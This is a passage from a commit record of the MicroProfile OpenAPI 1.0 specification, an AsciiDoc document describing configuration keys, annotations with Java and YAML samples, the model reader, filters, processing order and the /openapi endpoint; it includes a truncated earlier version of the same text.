example,\n`mp.openapi.servers.path.\/airlines\/bookings\/{id}=https:\/\/xyz.io\/v1`\n| `mp.openapi.servers.operation.` | Prefix of the configuration property to specify an alternative list of servers to service an operation.\nOperations that want to specify an alternative list of servers must define an `operationId`, a unique string used to identify the operation. For example,\n`mp.openapi.servers.operation.getBooking=https:\/\/abc.io\/v1`\n|===\n\n==== Vendor extensions\n\nVendors that wish to provide vendor-specific configuration via MP Config (instead\nof another native configuration framework) must use the prefix `mp.openapi.extensions`.\n\n== Documentation Mechanisms\n\nThere are many different ways to provide input for the generation of the resulting\nOpenAPI document.\n\nThe MP OpenAPI specification requires vendors to produce a valid OpenAPI document\nfrom pure JAX-RS 2.0 applications. This means that vendors must process all the\nrelevant JAX-RS annotations (such as `@Path` and `@Consumes`) as well as Java objects\n(POJOs) used as input or output to JAX-RS operations. This is a good place to\nstart for application developers that are new to OpenAPI: just deploy your existing\nJAX-RS application into a MP OpenAPI vendor and check out the output from `\/openapi`!\n\nThe application developer then has a few choices:\n\n1. Augment those JAX-RS annotations with the\nOpenAPI <<Annotations>>. Using annotations means\ndevelopers don't have to re-write the portions of the OpenAPI document that are\nalready covered by the JAX-RS framework (e.g. the HTTP method of an operation).\n\n2. Take the initial output from `\/openapi` as a starting point to document\nyour APIs via <<Static OpenAPI files>>. It's worth mentioning that these static\nfiles can also be written before any code, which is an approach often adopted by\nenterprises that want to lock-in the contract of the API. In this case, we refer\nto the OpenAPI document as the \"source of truth\", by which the client and provider\nmust abide.\n\n3. Use the <<Programming model>> to provide a bootstrap (or complete)\nOpenAPI model tree.\n\nAdditionally, a <<Filter>> is described which can update the OpenAPI model after it has\nbeen built from the previously described documentation mechanisms.\n\n=== Annotations\n\nMany of these OpenAPI v3 annotations were derived from the https:\/\/github.com\/swagger-api\/swagger-core[Swagger Core] library, which\nallows for a mostly-mechanical transformation of applications that are using that\nlibrary and wish to take advantage to the official MP OpenAPI interfaces.\n\n==== Quick overview of annotations\n\nThe following annotations are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations[org.eclipse.microprofile.openapi.annotations] package.\n\n[cols=\"1,4\"]\n|===\n| Annotation | Description\n\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callback.java[@Callback] | Represents a callback URL that will be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callbacks.java[@Callbacks] | Represents an array of Callback URLs that can be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/CallbackOperation.java[@CallbackOperation] | Represents an operation that will be invoked during the callback.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Components.java[@Components] | A container that holds various reusable objects for different aspects of the OpenAPI Specification.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/Explode.java[@Explode] | Enumeration used to define the value of the `explode` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterIn.java[@ParameterIn] | Enumeration representing the parameter's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterStyle.java[@ParameterStyle] | Enumeration for the parameter's `style` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeIn.java[@SecuritySchemeIn] | Enumeration for the security scheme's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeType.java[@SecuritySchemeType] | Enumeration for the security scheme's `type` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extensions\/Extension.java[@Extension] | Adds an extension with contained properties.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extension\/Extensions.java[@Extensions] | Adds custom properties to an extension.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/ExternalDocumentation.java[@ExternalDocumentation] | References an external resource for extended documentation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/headers\/Header.java[@Header] | Describes a single header object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Contact.java[@Contact] | Contact information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Info.java[@Info] | This annotation encapsulates metadata about the API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/License.java[@License] | License information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/Link.java[@Link] | Represents a design-time link for a response.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/LinkParameter.java[@LinkParameter] | Represents a parameter to pass to the linked operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Content.java[@Content] | Provides schema and examples for a particular media type.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/DiscriminatorMapping.java[@DiscriminatorMapping] | Used to differentiate between other schemas which may satisfy the payload description.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Encoding.java[@Encoding] | Single encoding definition to be applied to single Schema Object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/ExampleObject.java[@ExampleObject] | Illustrates an example of a particular content.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Schema.java[@Schema] | Allows the definition of input and output data types.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/OpenAPIDefinition.java[@OpenAPIDefinition] | General metadata for an OpenAPI definition.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Operation.java[@Operation] | Describes an operation or typically a HTTP method against a specific path.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameter.java[@Parameter] | Describes a single operation parameter.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameters.java[@Parameters] | Encapsulates input parameters.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/RequestBody.java[@RequestBody] | Describes a single request body.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponse.java[@APIResponse] | Describes a single response from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponses.java[@APIResponses] | A container for multiple responses from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlow.java[@OAuthFlow] | Configuration details for a supported OAuth Flow.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlows.java[@OAuthFlows] | Allows configuration of the supported OAuth Flows.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthScope.java[@OAuthScope] | Represents an OAuth scope.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirement.java[@SecurityRequirement] | Specifies a security requirement for an operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirements.java[@SecurityRequirements] | Represents an array of security requirements where only one needs to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirementsSet.java[@SecurityRequirementsSet] | Represents an array of security requirements that need to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityScheme.java[@SecurityScheme] | Defines a security scheme that can be used by the operations.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecuritySchemes.java[@SecuritySchemes] | Represents an array of security schemes that can be specified.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Server.java[@Server]| Represents a server used in an operation or used by all operations in an OpenAPI document.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Servers.java[@Servers] | A container for multiple server definitions.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/ServerVariable.java[@ServerVariable] | Represents a server variable for server URL template substitution.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tag.java[@Tag] | Represents a tag for the API endpoint.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tags.java[@Tags] | A container of multiple tags.\n|===\n\n==== Detailed usage of key annotations\n\n===== Operation\n\n.Sample 1 - Simple operation description\n[source,Java]\n----\n@GET\n@Path(\"\/findByStatus\")\n@Operation(summary = \"Finds Pets by status\",\n description = \"Multiple status values can be provided with comma separated strings\")\npublic Response findPetsByStatus(...) { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\n\/pet\/findByStatus:\n get:\n summary: Finds Pets by status\n description: Multiple status values can be provided with comma separated strings\n operationId: findPetsByStatus\n----\n\n.Sample 2 - Operation with different responses\n[source,Java]\n----\n@GET\n@Path(\"\/{username}\")\n@Operation(summary = \"Get user by user name\")\n@APIResponse(description = \"The user\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = User.class))),\n@APIResponse(responseCode = \"400\", description = \"User not found\")\npublic Response getUserByName(\n @Parameter(description = \"The name that needs to be fetched. Use user1 for testing. \", required = true) @PathParam(\"username\") String username)\n {...}\n----\n\n.Output for Sample 2\n[source, yaml]\n----\n\/user\/{username}:\n get:\n summary: Get user by user name\n operationId: getUserByName\n parameters:\n - name: username\n in: path\n description: 'The name that needs to be fetched. Use user1 for testing. '\n required: true\n schema:\n type: string\n responses:\n default:\n description: The user\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/User'\n 400:\n description: User not found\n----\n\n\n===== RequestBody\n\n\n.Sample 1 - Simple RequestBody\n[source,Java]\n----\n@POST\n@Path(\"\/user\")\n@Operation(summary = \"Create user\",\n description = \"This can only be done by the logged in user.\")\npublic Response methodWithRequestBody(\n @RequestBody(description = \"Created user object\", required = true,\n content = @Content(schema = @Schema(implementation = User.class))) User user,\n @QueryParam(\"name\") String name, @QueryParam(\"code\") String code)\n { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\npost:\n summary: Create user\n description: This can only be done by the logged in user.\n operationId: methodWithRequestBody\n parameters:\n - name: name\n in: query\n schema:\n type: string\n - name: code\n in: query\n schema:\n type: string\n requestBody:\n description: Created user object\n content:\n '*\/*':\n schema:\n $ref: '#\/components\/schemas\/User'\n required: true\n responses:\n default:\n description: no description\n----\n\n===== Servers\n\n.Sample 1 - Extended Server scenarios\n[source,Java]\n----\n@OpenAPIDefinition(\n servers = {\n @Server(\n description = \"definition server 1\",\n url = \"http:\/\/{var1}.definition1\/{var2}\",\n variables = {\n @ServerVariable(name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})})\n@Server(\n description = \"class server 1\",\n url = \"http:\/\/{var1}.class1\/{var2}\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(\n name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n@Server(\n description = \"class server 2\",\n url = \"http:\/\/{var1}.class2\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\npublic class ServersResource {\n\n @GET\n @Path(\"\/\")\n @Server(\n description = \"method server 1\",\n url = \"http:\/\/{var1}.method1\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n @Server(\n description = \"method server 2\",\n url = \"http:\/\/method2\"\n )\n public Response getServers() {\n return Response.ok().entity(\"ok\").build();\n }\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\nopenapi: 3.0.0\nservers:\n- url: http:\/\/{var1}.definition1\/{var2}\n description: definition server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\npaths:\n \/:\n get:\n operationId: getServers\n responses:\n default:\n description: default response\n servers:\n - url: http:\/\/{var1}.class1\/{var2}\n description: class server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.class2\n description: class server 2\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.method1\n description: method server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/method2\n description: method server 2\n variables: {}\n----\n\n===== Schema\n\n.Sample 1 - Schema POJO\n[source,Java]\n----\n@Schema(name=\"MyBooking\", description=\"POJO that represents a booking.\")\npublic class Booking {\n @Schema(required = true, example = \"32126319\")\n private String airMiles;\n\n @Schema(required = true, example = \"window\")\n private String seatPreference;\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\ncomponents:\n schemas:\n MyBooking:\n description: POJO that represents a booking.\n required:\n - airMiles\n - seatPreference\n type: object\n properties:\n airMiles:\n type: string\n example: \"32126319\"\n seatPreference:\n type: string\n example: window\n----\n\n\n.Sample 2 - Schema POJO reference\n[source,Java]\n----\n@POST\npublic Response createBooking(\n @RequestBody(description = \"Create a new booking.\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = Booking.class))) Booking booking) {\n----\n\n.Output for Sample 2\n[source, yaml]\n----\npost:\n operationId: createBooking\n requestBody:\n description: Create a new booking with the provided information.\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/MyBooking'\n----\n\n\nFor more samples please see the https:\/\/github.com\/eclipse\/microprofile-open-api\/wiki[MicroProfile Wiki].\n\n=== Static OpenAPI files\n\nApplication developers may wish to include a pre-generated OpenAPI document that\nwas written separately from the code (e.g. with an editor such as https:\/\/editor.swagger.io\/[this]).\n\nDepending on the scenario, the document may be fully complete or partially complete.\nIf a document is fully complete then the application developer will want to set the\n`mp.openapi.scan.disable` configuration property to `true`. If a document is partially\ncomplete, then the application developer will need to augment the OpenAPI snippet\nwith annotations, programming model, or via the filter.\n\n==== Location and formats\n\nVendors are required to fetch a single document named `openapi` with an extension\nof `yml`, `yaml` or `json`, inside the application's `META-INF` folder. If there\nis more than one document found that matches one of these extensions the behavior\nof which file is chosen is undefined (i.e. each vendor may implement their own logic),\nwhich means that application developers should only place a single `openapi` document\ninto that folder.\n\n=== Programming model\n\nApplication developers are able to provide OpenAPI elements via Java POJOs. The\ncomplete set of models are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models[org.eclipse.microprofile.openapi.models] package.\n\n==== OASFactory\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFactory.java[OASFactory] is used to create all of the elements of an OpenAPI tree.\n\nFor example, the following snippet creates a simple https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models\/info\/Info.java[Info] element that contains a title, description, and version.\n\n[source,java]\n----\nOASFactory.createObject(Info.class).title(\"Airlines\").description(\"Airlines APIs\").version(\"1.0.0\");\n----\n\n==== OASModelReader\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASModelReader.java[OASModelReader] interface allows application developers to bootstrap the OpenAPI model tree\nused by the processing framework. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.model.reader` configuration\nkey, where the value is the fully qualified name of the reader class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.model.reader=com.mypackage.MyModelReader\n----\n\nSimilar to static files, the model reader can be used to provide either complete\nor partial model trees. If providing a complete OpenAPI model tree, application\ndevelopers should set the `mp.openapi.scan.disable` configuration to `true`.\nOherwise this partial model will be used as the base model during the processing\nof the other <<Documentation Mechanisms>>.\n\nVendors are required to call the OASReader a single time, in the order defined by\nthe <<Processing rules>> section. Only a single OASReader instance is allowed per\napplication.\n\n=== Filter\n\nThere are many scenarios where application developers may wish to update or remove\ncertain elements and fields of the OpenAPI document. This is done via a filter,\nwhich is called once after all other documentation mechanisms have completed.\n\n==== OASFilter\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFilter.java[OASFilter] interface allows application developers\nto receive callbacks for various key OpenAPI elements. The interface has a default\nimplementation for every method, which allows application developers to only override\nthe methods they care about. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.filter` configuration\nkey, where the value is the fully qualified name of the filter class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.filter=com.mypackage.MyFilter\n----\n\nVendors are required to call all registered filters in the application (0..N) once\nfor each filtered element. For example, the method `filterPathItem` is\ncalled *for each* corresponding `PathItem` element in the model tree. This allows\napplication developers to filter the element and any of its descendants.\n\nThe order of filter methods called is undefined, with two exceptions:\n\n1. All filterable descendant elements of a filtered element must be called before its ancestor.\n2. The `filterOpenAPI` method must be the *last* method called on a filter (which\nis just a specialization of the first exception).\n\n=== Processing rules\n\nThe processed document available from the <<OpenAPI Endpoint>> is built from a variety of sources,\nwhich were outlined in the sub-headings of <<Documentation Mechanisms>>. Vendors\nare required to process these different sources in the following order:\n\n1. Fetch configuration values from `mp.openapi` namespace\n2. Call OASModelReader\n3. Fetch static OpenAPI file\n4. Process annotations\n5. Filter model via OASFilter\n\n**Example processing**:\n\n* A vendor starts by fetching all available <<Configuration>>. If\nan `OASModelReader` was specified in that configuration list, its `buildModel`\nmethod is called to form the starting OpenAPI model tree for this application.\n* Any <<Vendor specific configuration>> are added on top of that starting model (overriding\nconflicts), or create a new model if an `OASModelReader` was not registered.\n* The vendor searches for a file as defined in the section <<Static OpenAPI files>>.\nIf found, it will read that document and merge with the model produced by previous\nprocessing steps (if any), where conflicting elements from the static file will override\nthe values from the original model.\n* If annotation scanning was not disabled, the JAX-RS and OpenAPI annotations from\nthe application will be processed, further overriding any conflicting elements\nfrom the current model.\n* The final model is filtered by walking the model tree and invoking all registered\n<<OASFilter>> classes.\n\n== OpenAPI Endpoint\n\n=== Overview\nA fully processed and valid OpenAPI document must be available at the root\nURL `\/openapi`, as a `HTTP GET` operation.\n\nFor example, `GET http:\/\/myHost:myPort\/openapi`.\n\nThis document represents the result of the applied <<Processing rules>>.\n\nThe protocol required is `http`. Vendors are encouraged, but not required, to\nsupport the `https` protocol as well, to enable a secure connection to the OpenAPI\nendpoint.\n\n=== Content format\nThe default format of the `\/openapi` endpoint is `YAML`.\n\nVendors must also support the `JSON` format if the request contains an `Accept`\nheader with a value of `application\/json`, in which case the response must contain\na `Content-Type` header with value of `application\/json`.\n\n=== Query parameters\nNo query parameters are required for the `\/openapi` endpoint. However, one\nsuggested but optional query parameter for vendors to support is `format`,\nwhere the value can be either `json` or `yaml`, to facilitate the toggle between\nthe default `yaml` format and `json` format.\n\n=== Context root behaviour\nVendors are required to ensure that the combination of each global https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#serverObject[server]\nelement and https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#pathItemObject[pathItem] element resolve to the absolute backend URL of that\nparticular path. If that `pathItem` contains a `servers` element , then this\nlist of operation-level `server` elements replaces the global list of servers\nfor that particular `pathItem`.\n\nFor example: an application may have an `ApplicationPath` annotation with the\nvalue of `\/`, but is assigned the context root of `\/myApp` during deployment. In\nthis case, the `server` elements (either global or operation-level) must either\nend with `\/myApp` or a corresponding proxy. Alternatively it is valid, but discouraged, to\nadd that context root (`\/myApp`) to every `pathItem` defined in that application.\n\n=== Multiple applications\n\nThe 1.0 version of the MicroProfile OpenAPI specification does not define how\nthe `\/openapi` endpoint may be partitioned in the event that the MicroProfile\nruntime supports deployment of multiple applications. If an implementation wishes\nto support multiple applications within a MicroProfile runtime, the semantics of\nthe `\/openapi` endpoint are expected to be the logical AND of all the applications\nin the runtime, which would imply merging multiple OpenAPI documents into a single\nvalid document (handling conflicting IDs and unique names).\n\n\n== Limitations\n\n=== Internationalization\nThe 1.0 version of the MicroProfile OpenAPI spec does not require vendors to\nsupport multiple languages based on the `Accept-Language`. One reasonable\napproach is for vendors to support unique keys (instead of hardcoded text) via\nthe various <<Documentation Mechanisms>>, so that the implementing framework can\nperform a global replacement of the keys with the language-specific text that\nmatches the `Accept-Language` request for the `\/openapi` endpoint. A cache of\nprocessed languages can be kept to improve performance.\n\n=== Validation\n\nThe MP OpenAPI 1.0 specification does not mandate vendors to validate the resulting\nOpenAPI v3 model (after processing the 5 steps previously mentioned), which means\nthat the behavior of invalid models is vendor specific (i.e. vendors may choose to\nignore, reject, or pass-through invalid inputs).\n\n=== Cross Origin Resource Sharing (CORS)\n\nThe MP OpenAPI 1.0 specification does not require vendors to support https:\/\/www.w3.org\/TR\/cors\/[CORS]\nfor the `\/openapi` endpoint. The behavior of CORS requests is implementation dependent.\n\ninclude::release_notes.asciidoc[]\n","old_contents":"\/\/\n\/\/ Copyright (c) 2017 Contributors to the Eclipse Foundation\n\/\/\n\/\/ See the NOTICE file(s) distributed with this work for additional\n\/\/ information regarding copyright ownership.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n:version-label!:\n:sectanchors:\n:doctype: book\n:license: Apache License v2.0\n:source-highlighter: coderay\n:sectnums:\n:toc: left\n:toclevels: 4\nifdef::backend-pdf[]\n:pagenums:\nendif::[]\n\ninclude::license-alv2.asciidoc[]\n\n= MicroProfile OpenAPI Specification\n\n== Introduction\nExposing APIs has become an essential part of all modern applications. At the\ncenter of this revolution known as the API Economy we find RESTful APIs, which can\ntransform any application into language agnostic services that can be called from\nanywhere: on-premises, private cloud, public cloud, etc.\n\nFor the clients and providers of these services to connect there needs to be a\nclear and complete contract. Similar to the WSDL contract for legacy Web Services,\nthe https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md[OpenAPI v3] specification is the contract for\nRESTful Services.\n\nThis MicroProfile specification, called OpenAPI 1.0, aims to provide a set of Java\ninterfaces and programming models which allow Java developers to natively produce\nOpenAPI v3 documents from their JAX-RS applications.\n\n== Architecture\n\nThere are different ways to augment a JAX-RS application in order to produce an\nOpenAPI document, which are described in <<Documentation Mechanisms>>. The picture\nbelow provides a quick overview of the different types of components that make up\nthe MP OpenAPI specification:\n\n:imagesdir: images\nimage::diagram.png[Architecture Diagram]\n\nThe remaining sections of this specification will go into the details of each component.\n\n== Configuration\n\nConfiguration of various parts of this specification is provided via the https:\/\/github.com\/eclipse\/microprofile-config[MicroProfile Config] mechanism,\nwhich means that vendors implementing the MP OpenAPI specification must also implement\nthe MP Config specification.\n\nThere are various ways to inject these configuration values into an MP OpenAPI\nframework, including the https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configources[default ConfigSource] as well as\nhttps:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#custom-configsources[custom ConfigSource].\n\nVendors implementing the MP OpenAPI specification can optionally provide additional native\nways for these configuration values to be injected into the framework\n(e.g. via a server configuration file), as long as they also implement the MP Config\nspecification.\n\n\n=== List of configurable items\n\nVendors must support all the <<Core configurations>> of this specification.\nOptionally, they may also support <<Vendor extensions>> that allow the configuration of\nframework-specific values for configurations that affect implementation behavior.\n\nFor convenience of vendors (and application developers using custom ConfigSources),\nthe full list of supported configuration keys is available as constants in the\nhttps:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASConfig.java[OASConfig] class.\n\n==== Core configurations\n\nThe following is a list of configuration values that every vendor must support.\n\n[cols=\"1,4\"]\n|===\n| Config key | Value description\n\n| `mp.openapi.model.reader` | Configuration property to specify the fully qualified name of the <<OASModelReader>> implementation.\n| `mp.openapi.filter` | Configuration property to specify the fully qualified name of the <<OASFilter>> implementation.\n| `mp.openapi.scan.disable` | Configuration property to disable annotation scanning. Default value is `false`.\n| `mp.openapi.scan.packages` | Configuration property to specify the list of packages to scan. For example,\n`mp.openapi.scan.packages=com.xyz.PackageA,com.xyz.PackageB`\n| `mp.openapi.scan.classes` | Configuration property to specify the list of classes to scan. For example,\n`mp.openapi.scan.classes=com.xyz.MyClassA,com.xyz.MyClassB`\n| `mp.openapi.scan.exclude.packages` | Configuration property to specify the list of packages to exclude from scans. For example,\n`mp.openapi.scan.exclude.packages=com.xyz.PackageC,com.xyz.PackageD`\n| `mp.openapi.scan.exclude.classes` | Configuration property to specify the list of classes to exclude from scans. For example,\n`mp.openapi.scan.exclude.classes=com.xyz.MyClassC,com.xyz.MyClassD`\n| `mp.openapi.servers` | Configuration property to specify the list of global servers that provide connectivity information. For example,\n`mp.openapi.servers=https:\/\/xyz.com\/v1,https:\/\/abc.com\/v1`\n| `mp.openapi.servers.path.` | Prefix of the configuration property to specify an alternative list of servers to service all operations in a path. For example,\n`mp.openapi.servers.path.\/airlines\/bookings\/{id}=https:\/\/xyz.io\/v1`\n| `mp.openapi.servers.operation.` | Prefix of the configuration property to specify an alternative list of servers to service an operation.\nOperations that want to specify an alternative list of servers must define an `operationId`, a unique string used to identify the operation. For example,\n`mp.openapi.servers.operation.getBooking=https:\/\/abc.io\/v1`\n|===\n\n==== Vendor extensions\n\nVendors that wish to provide vendor-specific configuration via MP Config (instead\nof another native configuration framework) must use the prefix `mp.openapi.extensions`.\n\n== Documentation 